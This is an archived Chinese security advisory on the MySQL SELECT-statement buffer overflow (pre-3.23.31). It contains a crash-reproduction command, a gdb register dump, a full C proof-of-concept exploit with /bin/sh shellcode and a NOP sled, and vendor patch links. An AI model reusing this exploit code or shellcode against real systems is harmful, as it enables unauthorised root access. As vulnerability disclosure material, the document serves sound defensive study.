?? mysql實(shí)例-4.htm
字號(hào):
<body bgcolor="#000000"><p><font color="#009900"><B>mysql遠(yuǎn)程緩沖區(qū)溢出漏洞</B></font></p>
<p><font color="#FFFFFF">受影響的系統(tǒng): <BR>
T.C.X DataKonsult MySQL 3.23.30 <BR>
T.C.X DataKonsult MySQL 3.23.29 <BR>
T.C.X DataKonsult MySQL 3.23.28 <BR>
T.C.X DataKonsult MySQL 3.23.27 <BR>
T.C.X DataKonsult MySQL 3.23.26 <BR>
T.C.X DataKonsult MySQL 3.23.25 <BR>
T.C.X DataKonsult MySQL 3.23.24 <BR>
T.C.X DataKonsult MySQL 3.23.23 <BR>
不受影響系統(tǒng): <BR>
T.C.X DataKonsult MySQL 3.23.31 <BR>
描述: <BR>
--------------------------------------------------------------------------------
<BR>
<BR>
<BR>
BUGTRAQ ID :2262 <BR>
<BR>
MySQL是一個(gè)開(kāi)放源代碼的自由數(shù)據(jù)庫(kù)軟件。3.23.31以前的版本都存在一個(gè)緩沖區(qū) <BR>
溢出漏洞。 <BR>
<BR>
通過(guò)使用一個(gè)特別長(zhǎng)的字符串作為SELECT語(yǔ)句的參數(shù),可能導(dǎo)致mysqld發(fā)生緩沖區(qū) <BR>
溢出。堆棧中的數(shù)據(jù)可能被覆蓋或修改,攻擊者可能遠(yuǎn)程獲取mysqld的運(yùn)行權(quán)限或 <BR>
使mysqld數(shù)據(jù)庫(kù)崩潰。 <BR>
<BR>
<*來(lái)源:Joao Gouveia (tharbad@kaotik.org) *> <BR>
<BR>
<BR>
測(cè)試程序: <BR>
--------------------------------------------------------------------------------
<BR>
<BR>
警 告 <BR>
<BR>
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)! <BR>
<BR>
<BR>
<BR>
Joao Gouveia提供了下列測(cè)試步驟: <BR>
<BR>
> On one terminal: <BR>
> <quote> <BR>
> spike:/var/mysql # /sbin/init.d/mysql start <BR>
> Starting service MySQL. <BR>
> Starting mysqld daemon with databases from /var/mysql <BR>
> done <BR>
> spike:/var/mysql # <BR>
></quote> <BR>
> <BR>
> On the other terminal: <BR>
> <quote> <BR>
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
<BR>
> Enter password: <BR>
> (hanged..^C) <BR>
> </quote> <BR>
> <BR>
> On the first terminal i got: <BR>
> <quote> <BR>
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
<BR>
> nohup <BR>
> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
<BR>
> g "$@" >>$err_log 2>&1> <BR>
> Number of processes running now: 0 <BR>
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001 <BR>
> mysqld daemon ended <BR>
> </quote> <BR>
> <BR>
> gdb shows the following: <BR>
> <quote> <BR>
> (gdb) run <BR>
> Starting program: /usr/sbin/mysqld <BR>
> [New Thread 16897 (manager thread)] <BR>
> [New Thread 16891 (initial thread)] <BR>
> [New Thread 16898] <BR>
> /usr/sbin/mysqld: ready for connections <BR>
> [New Thread 16916] <BR>
> [Switching to Thread 16916] <BR>
> <BR>
> Program received signal SIGSEGV, Segmentation fault. <BR>
> 0x41414141 in ?? () <BR>
> (gdb) info all-registers <BR>
> eax 0x1 1 <BR>
> ecx 0x68 104 <BR>
> edx 0x8166947 135686471 <BR>
> ebx 0x41414141 1094795585 <BR>
> ebp 0x41414141 0x41414141 <BR>
> esi 0x41414141 1094795585 <BR>
> edi 0x0 0 <BR>
> eip 0x41414141 0x41414141 <BR>
> eflags 0x10246 66118 <BR>
> cs 0x23 35 <BR>
> ss 0x2b 43 <BR>
> ds 0x2b 43 <BR>
> es 0x2b 43 <BR>
> fs 0x0 0 <BR>
> gs 0x0 0 <BR>
> (gdb) <BR>
> </quote> <BR>
<BR>
Luis Miguel Silva [aka wC](lms@ispgaya.pt)提供了一個(gè)測(cè)試程序: <BR>
<BR>
#include <stdio.h> <BR>
<BR>
#define DEFAULT_OFFSET 0 <BR>
#define DEFAULT_BUFFER_SIZE 130 <BR>
#define NOP 0x90 <BR>
<BR>
// Our EVIL code... <BR>
char shellcode[] = <BR>
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" <BR>
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" <BR>
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; <BR>
<BR>
unsigned <BR>
long get_sp(void) { <BR>
__asm__("movl %esp,%eax"); <BR>
} <BR>
<BR>
// Where it all happens... <BR>
main(int argc, char *argv[]) <BR>
{ <BR>
char *buffer, *ptr, tmp[1500]; <BR>
long *addr_ptr, addr; <BR>
int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET; <BR>
<BR>
printf("\nMySQL [al versions < 3.23.31] Local Exploit by <BR>
lms@ispgaya.pt\n\n"); <BR>
if (argc==2) offset=atoi(argv[1]); <BR>
else <BR>
printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");
<BR>
<BR>
printf("Trying to allocate memory for buffer (%d bytes)...",bsize); <BR>
if (!(buffer = malloc(bsize))) { <BR>
printf("ERROR!\n"); <BR>
printf("Couldn't allocate memory...\n"); <BR>
printf("Exiting...\n"); <BR>
exit(0); <BR>
} <BR>
printf("SUCCESS!\n"); <BR>
addr=get_sp()-offset; <BR>
printf("Using address : 0x%x\n", addr); <BR>
printf("Offset : %d\n",offset); <BR>
printf("Buffer Size : %d\n",bsize); <BR>
ptr=buffer; <BR>
addr_ptr=(long *) ptr; <BR>
for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr; <BR>
for (i=0;i<bsize/2;i++) buffer[i]=NOP; <BR>
ptr=buffer+((bsize/2)-(strlen(shellcode)/2)); <BR>
for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; <BR>
buffer[bsize-1]='\0'; <BR>
snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer); <BR>
printf("Oh k...i have the evil'buffer right here :P\n"); <BR>
printf("So...[if all went well], prepare to be r00t...\n"); <BR>
system(tmp); <BR>
} <BR>
<BR>
<BR>
--------------------------------------------------------------------------------
<BR>
建議: <BR>
<BR>
廠商補(bǔ)丁: <BR>
<BR>
NSFOCUS建議您立即升級(jí)到MySQL 3.23.31以上版本,它已經(jīng)解決了這一問(wèn)題。 <BR>
廠商地址:http://www.mysql.com/ <BR>
<BR>
很多Linux廠商也提供了升級(jí)軟件包: <BR>
<BR>
【redhat】 <BR>
<BR>
Red Hat Linux 7.0: <BR>
<BR>
SRPMS: <BR>
http://updates.redhat.com/7.0/SRPMS/mysql-3.23.32-1.7.src.rpm <BR>
http://updates.redhat.com/7.0/SRPMS/mysqlclient9-3.23.22-3.src.rpm <BR>
<BR>
alpha: <BR>
http://updates.redhat.com/7.0/alpha/mysql-3.23.32-1.7.alpha.rpm <BR>
http://updates.redhat.com/7.0/alpha/mysql-devel-3.23.32-1.7.alpha.rpm <BR>
http://updates.redhat.com/7.0/alpha/mysql-server-3.23.32-1.7.alpha.rpm <BR>
http://updates.redhat.com/7.0/alpha/mysqlclient9-3.23.22-3.alpha.rpm <BR>
<BR>
i386: <BR>
http://updates.redhat.com/7.0/i386/mysql-3.23.32-1.7.i386.rpm <BR>
http://updates.redhat.com/7.0/i386/mysql-devel-3.23.32-1.7.i386.rpm <BR>
http://updates.redhat.com/7.0/i386/mysql-server-3.23.32-1.7.i386.rpm <BR>
http://updates.redhat.com/7.0/i386/mysqlclient9-3.23.22-3.i386.rpm <BR>
<BR>
【debian】 <BR>
<BR>
Debian GNU/Linux 2.2 alias potato <BR>
- ------------------------------------ <BR>
<BR>
Source archives: <BR>
<BR>
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.diff.gz
<BR>
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.dsc
<BR>
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32.orig.tar.gz
<BR>
<BR>
Architecture independent: <BR>
<BR>
http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb
<BR>
<BR>
Intel ia32 architecture: <BR>
<BR>
http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-client_3.22.32-4_i386.deb
<BR>
http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-server_3.22.32-4_i386.deb
<BR>
<BR>
Motorola 680x0 architecture: <BR>
<BR>
http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-client_3.22.32-4_m68k.deb
<BR>
http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-server_3.22.32-4_m68k.deb
<BR>
<BR>
Sun Sparc architecture: <BR>
<BR>
http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-client_3.22.32-4_sparc.deb
<BR>
http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-server_3.22.32-4_sparc.deb
<BR>
<BR>
Alpha architecture: <BR>
<BR>
http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-client_3.22.32-4_alpha.deb
<BR>
http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-server_3.22.32-4_alpha.deb
<BR>
<BR>
PowerPC architecture: <BR>
<BR>
http://security.debian.org/dists/stable/updates/main/binary-powerpc/php4-mysql_4.0.3pl1-0potato1_powerpc.deb
<BR>
http://security.debian.org/dists/stable/updates/main/binary-powerpc/mysql-server_3.22.32-4_powerpc.deb
<BR>
<BR>
ARM architecture: <BR>
<BR>
http://security.debian.org/dists/stable/updates/main/binary-arm/mysql-server_3.22.32-4_arm.deb
<BR>
http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb
<BR>
<BR>
</font></p>
?? 快捷鍵說(shuō)明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號(hào)
Ctrl + =
減小字號(hào)
Ctrl + -